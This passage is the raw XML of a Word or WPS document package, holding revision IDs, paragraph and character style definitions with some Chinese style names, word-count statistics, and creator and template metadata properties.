    <w:rsid w:val="7D756300"/>
    <w:rsid w:val="7DA51F27"/>
    <w:rsid w:val="7DE8348E"/>
    <w:rsid w:val="7DEB6A0D"/>
    <w:rsid w:val="7DF804B8"/>
    <w:rsid w:val="7E1875BC"/>
    <w:rsid w:val="7E1E2B24"/>
    <w:rsid w:val="7E3C2153"/>
    <w:rsid w:val="7E9059CF"/>
    <w:rsid w:val="7F5462BC"/>
    <w:rsid w:val="7F557819"/>
    <w:rsid w:val="7F863357"/>
    <w:rsid w:val="7F9B10FB"/>
    <w:rsid w:val="7FAC753D"/>
    <w:rsid w:val="7FCF4A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line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="华文宋体" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 5"/>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3">
    <w:name w:val="heading 6"/>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9">
    <w:name w:val="Default Paragraph Font"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="8">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link w:val="14"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="13"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="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character" w:styleId="10">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="9"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="9"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="5"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="4"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="自定义正文"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cstheme="minorBidi"/>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2291</Words>
  <Characters>3463</Characters>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3694</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2008-09-12T01:20:00Z</dcterms:created>
  <dc:creator>华硕</dc:creator>
  <cp:lastModifiedBy>Pluto</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-14T16:13:23Z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08A74A00F2294C27A9AB1CAA15FAEFCA_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMjZkODVlOTY1ZDEwMDdkNzM3YTBlN2MzZTk3NGVhOWEiLCJ1c2VySWQiOiIxMzgyNzI4OTc0In0=</vt:lpwstr>
  </property>
</Properties>
</file>